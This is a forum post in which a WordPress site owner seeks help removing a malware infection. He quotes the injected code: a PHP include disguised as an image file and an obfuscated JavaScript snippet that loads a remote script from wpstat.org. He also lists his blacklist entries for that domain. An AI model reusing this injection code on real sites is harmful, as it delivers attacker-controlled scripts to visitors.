Script (malware?) still loading

Hi,

I am facing a malware injection since days. I succeed removing the code injection I found. The malware initially injected this code into some pages:
<?php include(‘assets/images/social.png’); ?>

But I still see in Chrome Console a script loaded in my website. I did not find which file is calling it.

<script type="text/javascript">
var now = new Date().getTime();
if (now%2 == 0) {
if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.wpstat.org/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.wpstat.org/jquery.js"></scr'+'ipt>'); }
}
</script>

I have decided to use your plugin and to add the strings wpstat and wpstat.org in the blacklist.

$bbq_blacklist_request_uri_items = array(‘wpstat.org’);
$bbq_blacklist_query_string_items = array(‘wpstat.org’);
$bbq_blacklist_user_agent_items = array(‘wpstat.org’);

However, the script is still loaded in every page. I spent hours and hours trying to fix this but I failed.

If you have any lead or solution to solve this issue I woulb be really grateful.

Thanks again for your great plugin.

Marc

http://www.angelinextension.com

https://wordpress.org/plugins/block-bad-queries/